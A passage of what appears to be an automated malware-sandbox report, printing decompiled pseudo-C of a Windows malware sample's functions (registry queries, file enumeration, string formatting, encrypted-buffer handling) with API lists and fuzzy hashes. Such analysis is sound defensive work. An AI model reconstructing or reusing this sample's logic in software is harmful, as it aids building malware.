                                                                                    • Part of subcall function 033F57B9: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,033F544E,?), ref: 033F57DF
                                                                                    • Part of subcall function 033F57B9: RegEnumKeyExA.KERNELBASE(?,?,?,033F544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,033F544E), ref: 033F5826
                                                                                    • Part of subcall function 033F57B9: WaitForSingleObject.KERNEL32(00000000,?,?,?,033F544E,?,033F544E,?,?,?,?,?,033F544E,?), ref: 033F5893
                                                                                    • Part of subcall function 033F57B9: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,033F544E,?,?,?,?,?,033F38C3,?), ref: 033F58BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 780868161-0
                                                                                  • Opcode ID: b3ff365e918f0f46a5bd231fb253e28fdc4a49cf9f3eb486b1e1b3b9bdc839c6
                                                                                  • Instruction ID: 839da6bcf9757aaaadc648042174b35bc7463875581925f837901dc5f7932ec1
                                                                                  • Opcode Fuzzy Hash: b3ff365e918f0f46a5bd231fb253e28fdc4a49cf9f3eb486b1e1b3b9bdc839c6
                                                                                  • Instruction Fuzzy Hash: 39218076D00619AFDB10FFA688C48AEB3ADEF06352BC94465EB11EB100D734D9858BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E033F4E6B(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr* _t28;
                                                                                  				intOrPtr _t31;
                                                                                  				intOrPtr* _t32;
                                                                                  				void* _t39;
                                                                                  				int _t46;
                                                                                  				intOrPtr* _t47;
                                                                                  				int _t48;
                                                                                  
                                                                                  				_t47 = __eax;
                                                                                  				_push( &_v12);
                                                                                  				_push(__eax);
                                                                                  				_t39 = 0;
                                                                                  				_t46 = 0; // executed
                                                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                  				_v8 = _t26;
                                                                                  				if(_t26 < 0) {
                                                                                  					L13:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				if(_v12 == 0) {
                                                                                  					Sleep(0xc8);
                                                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                  				}
                                                                                  				if(_v8 >= _t39) {
                                                                                  					_t28 = _v12;
                                                                                  					if(_t28 != 0) {
                                                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                  						_v8 = _t31;
                                                                                  						if(_t31 >= 0) {
                                                                                  							_t46 = lstrlenW(_v16);
                                                                                  							if(_t46 != 0) {
                                                                                  								_t46 = _t46 + 1;
                                                                                  								_t48 = _t46 + _t46;
                                                                                  								_t39 = E033F75C4(_t48);
                                                                                  								if(_t39 == 0) {
                                                                                  									_v8 = 0x8007000e;
                                                                                  								} else {
                                                                                  									memcpy(_t39, _v16, _t48);
                                                                                  								}
                                                                                  								__imp__#6(_v16); // executed
                                                                                  							}
                                                                                  						}
                                                                                  						_t32 = _v12;
                                                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                  					}
                                                                                  					 *_a4 = _t39;
                                                                                  					 *_a8 = _t46 + _t46;
                                                                                  				}
                                                                                  				goto L13;
                                                                                  			}















                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000000C8), ref: 033F4E99
                                                                                  • lstrlenW.KERNEL32(?), ref: 033F4ECF
                                                                                  • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 033F4EF0
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F4F04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1198164300-0
                                                                                  • Opcode ID: 3c64ef03801e92dae1366cbe6133c236ded14a9f393975fd45b16b17031055a1
                                                                                  • Instruction ID: 525b2dd1442be73289dce393d75df8179db12744a7f15335951a4dd14dbab6a6
                                                                                  • Opcode Fuzzy Hash: 3c64ef03801e92dae1366cbe6133c236ded14a9f393975fd45b16b17031055a1
                                                                                  • Instruction Fuzzy Hash: E6213075E01209EFCB10DFA9D8C49AFBBB8FF49345B5441A9EA05E7214E730DA41CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4C46() {
                                                                                  				void* _v8;
                                                                                  				int _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* __esi;
                                                                                  				void* _t23;
                                                                                  				intOrPtr _t24;
                                                                                  				void* _t26;
                                                                                  				intOrPtr _t32;
                                                                                  				intOrPtr _t35;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t40;
                                                                                  				intOrPtr _t42;
                                                                                  				void* _t45;
                                                                                  				void* _t54;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_t23 = E033F6D86(0,  &_v8); // executed
                                                                                  				if(_t23 != 0) {
                                                                                  					_v8 = 0;
                                                                                  				}
                                                                                  				_t24 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t4 = _t24 + 0x33fed80; // 0x5f29328
                                                                                  				_t5 = _t24 + 0x33fed28; // 0x4f0053
                                                                                  				_t26 = E033F4195( &_v16, _v8, _t5, _t4); // executed
                                                                                  				_t45 = _t26;
                                                                                  				if(_t45 == 0) {
                                                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                                                  					_t45 = 8;
                                                                                  					if(_v12 < _t45) {
                                                                                  						_t45 = 1;
                                                                                  						__eflags = 1;
                                                                                  					} else {
                                                                                  						_t32 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t11 = _t32 + 0x33fed74; // 0x5f2931c
                                                                                  						_t48 = _t11;
                                                                                  						_t12 = _t32 + 0x33fed28; // 0x4f0053
                                                                                  						_t54 = E033F7AC8(_t11, _t12, _t11);
                                                                                  						_t58 = _t54;
                                                                                  						if(_t54 != 0) {
                                                                                  							_t35 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							_t13 = _t35 + 0x33fedbe; // 0x30314549
                                                                                  							if(E033F5BC3(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
                                                                                  								_t60 =  *0x33fd214 - 6;
                                                                                  								if( *0x33fd214 <= 6) {
                                                                                  									_t42 =  *0x33fd230; // 0x2b2a5a8
                                                                                  									_t15 = _t42 + 0x33febda; // 0x52384549
                                                                                  									E033F5BC3(_t48, _t60, _v8, _t54, _t15, 0x13);
                                                                                  								}
                                                                                  							}
                                                                                  							_t38 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							_t17 = _t38 + 0x33fedb8; // 0x5f29360
                                                                                  							_t18 = _t38 + 0x33fed90; // 0x680043
                                                                                  							_t40 = E033F3FF3(_v8, 0x80000001, _t54, _t18, _t17); // executed
                                                                                  							_t45 = _t40;
                                                                                  							HeapFree( *0x33fd1f0, 0, _t54);
                                                                                  						}
                                                                                  					}
                                                                                  					HeapFree( *0x33fd1f0, 0, _v16);
                                                                                  				}
                                                                                  				_t53 = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					E033F30BF(_t53);
                                                                                  				}
                                                                                  				return _t45;
                                                                                  			}

















                                                                                  APIs
                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05F29328,00000000,?,73BCF710,00000000,73BCF730), ref: 033F4C95
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05F29360,?,00000000,30314549,00000014,004F0053,05F2931C), ref: 033F4D32
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,033F3858), ref: 033F4D44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: cfe14968d8744c34ac32d0fa366ebb379efce049da3ac015e54f019bbd013750
                                                                                  • Instruction ID: 16d401171c860051363d9943bd03de900203069a157de558ee0cb2d7057267dc
                                                                                  • Opcode Fuzzy Hash: cfe14968d8744c34ac32d0fa366ebb379efce049da3ac015e54f019bbd013750
                                                                                  • Instruction Fuzzy Hash: 4C31B135900208BFDB11EF95DDC8EAA7BBCEF44310F990265FA01AB165D770DA059BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E033F80F6(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                                                  				void* _v8;
                                                                                  				char _v48;
                                                                                  				void* __edi;
                                                                                  				intOrPtr _t22;
                                                                                  				long _t29;
                                                                                  				intOrPtr _t33;
                                                                                  				intOrPtr* _t41;
                                                                                  				void* _t42;
                                                                                  				void* _t46;
                                                                                  				intOrPtr* _t47;
                                                                                  				void* _t48;
                                                                                  				intOrPtr _t50;
                                                                                  
                                                                                  				_t42 = __ecx;
                                                                                  				_t41 = _a16;
                                                                                  				_t47 = __eax;
                                                                                  				_t22 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t2 = _t22 + 0x33fe671; // 0x657a6973
                                                                                  				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                                                  				if( *0x33fd204 >= 5) {
                                                                                  					_push( &_a16);
                                                                                  					_push( &_v8);
                                                                                  					_push( &_v48);
                                                                                  					_t29 = _a4;
                                                                                  					"QQSUVWh"();
                                                                                  					L5:
                                                                                  					_a4 = _t29;
                                                                                  					L6:
                                                                                  					if(_a4 != 0) {
                                                                                  						L9:
                                                                                  						 *0x33fd204 =  *0x33fd204 + 1;
                                                                                  						L10:
                                                                                  						return _a4;
                                                                                  					}
                                                                                  					_t49 = _a16;
                                                                                  					 *_t47 = _a16;
                                                                                  					_t48 = _v8;
                                                                                  					 *_t41 = E033F5AC5(_t49, _t48); // executed
                                                                                  					_t33 = E033F74F4(_t46, _t48, _t49); // executed
                                                                                  					if(_t33 != 0) {
                                                                                  						 *_a8 = _t48;
                                                                                  						 *_a12 = _t33;
                                                                                  						if( *0x33fd204 < 5) {
                                                                                  							 *0x33fd204 =  *0x33fd204 & 0x00000000;
                                                                                  						}
                                                                                  						goto L10;
                                                                                  					}
                                                                                  					_a4 = 0xbf;
                                                                                  					E033F53A8();
                                                                                  					HeapFree( *0x33fd1f0, 0, _t48);
                                                                                  					goto L9;
                                                                                  				}
                                                                                  				_t50 =  *0x33fd2f4; // 0x5f28d6c
                                                                                  				if(RtlAllocateHeap( *0x33fd1f0, 0, 0x800) == 0) {
                                                                                  					_a4 = 8;
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				_t29 = E033F3CC4(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                                                                                  				goto L5;
                                                                                  			}

                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 033F8118
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F813D
                                                                                    • Part of subcall function 033F3CC4: GetTickCount.KERNEL32 ref: 033F3CDB
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D28
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D45
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D65
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D83
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3DA6
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3DC7
                                                                                  • HeapFree.KERNEL32(00000000,033F38A2,?,?,033F38A2,?), ref: 033F81B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                                                  • String ID:
                                                                                  • API String ID: 2794511967-0
                                                                                  • Opcode ID: 4b26aa43f75519c477c63bba4352af9ad1ab2346428325931d6242db3e0847d3
                                                                                  • Instruction ID: b98d438d9f0894491166ee9b56fb41d71980288ac74a45b784103b199e39cbc4
                                                                                  • Opcode Fuzzy Hash: 4b26aa43f75519c477c63bba4352af9ad1ab2346428325931d6242db3e0847d3
                                                                                  • Instruction Fuzzy Hash: 9D314D75500209EFCB01EF68D8C8EDA7BBCFB09354F908126FA019B254D730D915CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 28%
                                                                                  			E033F5311(void* __ecx, signed char* _a4) {
                                                                                  				signed int _v8;
                                                                                  				void* _v12;
                                                                                  				void* _t13;
                                                                                  				signed short _t16;
                                                                                  				signed int _t17;
                                                                                  				void* _t19;
                                                                                  				intOrPtr _t20;
                                                                                  				void* _t22;
                                                                                  				void* _t23;
                                                                                  				signed short* _t26;
                                                                                  				void* _t27;
                                                                                  				intOrPtr* _t28;
                                                                                  				void* _t30;
                                                                                  				intOrPtr* _t31;
                                                                                  
                                                                                  				_t31 = __imp__;
                                                                                  				_t23 = 0;
                                                                                  				_v8 = 1;
                                                                                  				_t28 = 0x33fd2e0;
                                                                                  				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                                                                                  				while(1) {
                                                                                  					_t13 = E033F3512(_a4,  &_v12); // executed
                                                                                  					if(_t13 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push(_v12);
                                                                                  					_t19 = 0xd;
                                                                                  					_t20 = E033F745D(_t19);
                                                                                  					if(_t20 == 0) {
                                                                                  						HeapFree( *0x33fd1f0, 0, _v12);
                                                                                  						break;
                                                                                  					} else {
                                                                                  						 *_t28 = _t20;
                                                                                  						_t28 = _t28 + 4;
                                                                                  						_t23 = _t23 + 1;
                                                                                  						if(_t23 < 3) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  						}
                                                                                  					}
                                                                                  					L7:
                                                                                  					 *_t31(1);
                                                                                  					if(_v8 != 0) {
                                                                                  						_t26 =  *0x33fd2e8; // 0x5f29bf0
                                                                                  						_t16 =  *_t26 & 0x0000ffff;
                                                                                  						if(_t16 < 0x61 || _t16 > 0x7a) {
                                                                                  							_t17 = _t16 & 0x0000ffff;
                                                                                  						} else {
                                                                                  							_t17 = (_t16 & 0x0000ffff) - 0x20;
                                                                                  						}
                                                                                  						 *_t26 = _t17;
                                                                                  					}
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				goto L7;
                                                                                  			}

                                                                                  APIs
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F532E
                                                                                    • Part of subcall function 033F3512: RtlAllocateHeap.NTDLL(00000000,63699BC3,033FD2E0), ref: 033F353D
                                                                                    • Part of subcall function 033F3512: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 033F355F
                                                                                    • Part of subcall function 033F3512: memset.NTDLL ref: 033F3579
                                                                                    • Part of subcall function 033F3512: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 033F35B7
                                                                                    • Part of subcall function 033F3512: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 033F35CB
                                                                                    • Part of subcall function 033F3512: FindCloseChangeNotification.KERNELBASE(?), ref: 033F35E2
                                                                                    • Part of subcall function 033F3512: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 033F35EE
                                                                                    • Part of subcall function 033F3512: lstrcat.KERNEL32(?,642E2A5C), ref: 033F362F
                                                                                    • Part of subcall function 033F3512: FindFirstFileA.KERNELBASE(?,?), ref: 033F3645
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F5373
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,033F70B5,?), ref: 033F5367
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
                                                                                  • String ID:
                                                                                  • API String ID: 1489712272-0
                                                                                  • Opcode ID: 4cb78bf9f5da874817c95ea7a568efe6488704727175bc16f2c1f6b52640c820
                                                                                  • Instruction ID: d373ff2541991fdb5ad9bef33b020bd2ce71162a01fe53834fc02d7fb09cd36c
                                                                                  • Opcode Fuzzy Hash: 4cb78bf9f5da874817c95ea7a568efe6488704727175bc16f2c1f6b52640c820
                                                                                  • Instruction Fuzzy Hash: A111087A910209AFFB00DB99DCC4BACB7A9EB46354FD40027E601D6090C3B5D9419B54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F76D6(void* __ecx, void* __eflags) {
                                                                                  				char _v8;
                                                                                  				void* _v12;
                                                                                  				int _v16;
                                                                                  				int _v20;
                                                                                  				intOrPtr _t15;
                                                                                  				intOrPtr _t19;
                                                                                  				long _t24;
                                                                                  				long _t29;
                                                                                  				short* _t31;
                                                                                  				short* _t34;
                                                                                  
                                                                                  				_t15 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                  				_t3 = _t15 + 0x33fea60; // 0x4f0053
                                                                                  				_v16 = 4;
                                                                                  				_t31 = E033F7404(__ecx, _t3);
                                                                                  				if(_t31 != 0) {
                                                                                  					_t19 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t5 = _t19 + 0x33feabc; // 0x6e0049
                                                                                  					_t34 = E033F7404(__ecx, _t5);
                                                                                  					if(_t34 != 0) {
                                                                                  						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                                                                  						if(_t24 == 0) {
                                                                                  							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                                                                  							if(_t29 != 0) {
                                                                                  								_v8 = _v8 & 0x00000000;
                                                                                  							}
                                                                                  							RegCloseKey(_v12);
                                                                                  						}
                                                                                  						E033F4C31(_t34);
                                                                                  					}
                                                                                  					E033F4C31(_t31);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}














                                                                                  APIs
                                                                                    • Part of subcall function 033F7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,033F76F9,004F0053,00000000,?), ref: 033F740D
                                                                                    • Part of subcall function 033F7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,033F76F9,004F0053,00000000,?), ref: 033F7437
                                                                                    • Part of subcall function 033F7404: memset.NTDLL ref: 033F744B
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 033F7728
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 033F7744
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 033F7755
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 830012212-0
                                                                                  • Opcode ID: 70d8123046ba7244a9478f975896f196bfd63027968c0272c8b51e49ba706cd4
                                                                                  • Instruction ID: 25854c016c20b28adebd3ff2b30d65832e98214920b872338f1d06e2169e0c16
                                                                                  • Opcode Fuzzy Hash: 70d8123046ba7244a9478f975896f196bfd63027968c0272c8b51e49ba706cd4
                                                                                  • Instruction Fuzzy Hash: 48115B76900209BFDB11EB98DDC8FBEB7BCEB04740F940169F601E6159EB74D6059B20
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 033F7CAA
                                                                                  • memcpy.NTDLL(?,?,?), ref: 033F7CC4
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 033F7CF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$CreateDestroyFreeStringmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 4076844959-0
                                                                                  • Opcode ID: 228bbdc48b15f45969aad1c982e50ce3c19142b317cf87980ff5768cfd9f3be0
                                                                                  • Instruction ID: 5ca8204690a4e3721c1f56452f82fc98581e36fb33a4987b9fa6abab308fa80d
                                                                                  • Opcode Fuzzy Hash: 228bbdc48b15f45969aad1c982e50ce3c19142b317cf87980ff5768cfd9f3be0
                                                                                  • Instruction Fuzzy Hash: F3113C7290010ABFDF11EF95DC88EEEBBB9EF04350F408125FA05E6160E3759A15DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F7B54(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				int _v12;
                                                                                  				signed int _v16;
                                                                                  				void* _v20;
                                                                                  				signed char _v36;
                                                                                  				void* __ebx;
                                                                                  				void* _t24;
                                                                                  				intOrPtr _t27;
                                                                                  				signed int _t38;
                                                                                  				signed char* _t46;
                                                                                  				void* _t51;
                                                                                  				int _t53;
                                                                                  				void* _t55;
                                                                                  				void* _t56;
                                                                                  				void* _t57;
                                                                                  
                                                                                  				_t51 = __edx;
                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                  				_t46 = _a4;
                                                                                  				_t53 = ( *_t46 & 0x000000ff) + 0x90;
                                                                                  				_v12 = 0x90;
                                                                                  				_t24 = E033F75C4(_t53);
                                                                                  				_a4 = _t24;
                                                                                  				if(_t24 != 0) {
                                                                                  					memcpy(_t24,  *0x33fd280, 0x90);
                                                                                  					_t27 =  *0x33fd284; // 0x0
                                                                                  					_t57 = _t56 + 0xc;
                                                                                  					if(_t27 != 0) {
                                                                                  						E033F735E(_t46, _a4, 0x90, _t27, 0);
                                                                                  					}
                                                                                  					if(E033F7A2A( &_v36) != 0 && E033FA83A(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
                                                                                  						_t55 = _v20;
                                                                                  						_v36 =  *_t46;
                                                                                  						_t38 = E033F81E9(_a8,  &_v36, _t51, _t46, _a12, _t55); // executed
                                                                                  						_v16 = _t38;
                                                                                  						 *(_t55 + 4) = _v36;
                                                                                  						_t20 =  &(_t46[4]); // 0x8b4875fc
                                                                                  						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                                                                                  						_t57 = _t57 + 0xc;
                                                                                  						E033F4C31(_t55);
                                                                                  					}
                                                                                  					memset(_a4, 0, _t53);
                                                                                  					E033F4C31(_a4);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}


















                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • memcpy.NTDLL(00000000,00000090,033F38A2,033F38A2,?,?,033F38A2,?,?,033F819E,?), ref: 033F7B8A
                                                                                  • memset.NTDLL ref: 033F7BFF
                                                                                  • memset.NTDLL ref: 033F7C13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memset$AllocateHeapmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1529149438-0
                                                                                  • Opcode ID: 3612ed8f2308903e7c6b6cc9a861ddba92d59000ad8b794d701c332cf73cc99a
                                                                                  • Instruction ID: d7bcb62011a3cc0993d1085e7ffc6dd86e0666f0a00cfe34a1a7fb92b054e71c
                                                                                  • Opcode Fuzzy Hash: 3612ed8f2308903e7c6b6cc9a861ddba92d59000ad8b794d701c332cf73cc99a
                                                                                  • Instruction Fuzzy Hash: 13211D76900218BFDF11EBA5CD80FEEBBBCAF09350F444065FA04EA251E634D601CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 38%
                                                                                  			E033F4AC1(intOrPtr _a4) {
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				intOrPtr _v40;
                                                                                  				void* _v46;
                                                                                  				short _v48;
                                                                                  				intOrPtr _t49;
                                                                                  				void* _t51;
                                                                                  				intOrPtr* _t53;
                                                                                  				intOrPtr _t56;
                                                                                  				void* _t58;
                                                                                  				intOrPtr* _t59;
                                                                                  				intOrPtr* _t61;
                                                                                  				intOrPtr* _t63;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr* _t67;
                                                                                  				intOrPtr* _t69;
                                                                                  				intOrPtr* _t71;
                                                                                  				intOrPtr* _t73;
                                                                                  				intOrPtr _t76;
                                                                                  				intOrPtr* _t79;
                                                                                  				short _t81;
                                                                                  				char* _t97;
                                                                                  				intOrPtr _t99;
                                                                                  				void* _t105;
                                                                                  				void* _t107;
                                                                                  				intOrPtr _t111;
                                                                                  
                                                                                  				_t81 = 0;
                                                                                  				_v48 = 0;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosw");
                                                                                  				_t49 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t4 = _t49 + 0x33fe448; // 0x5f289f0
                                                                                  				_t5 = _t49 + 0x33fe438; // 0x9ba05972
                                                                                  				_t51 =  *0x33fd12c(_t5, 0, 4, _t4,  &_v20); // executed
                                                                                  				_t105 = _t51;
                                                                                  				if(_t105 >= 0) {
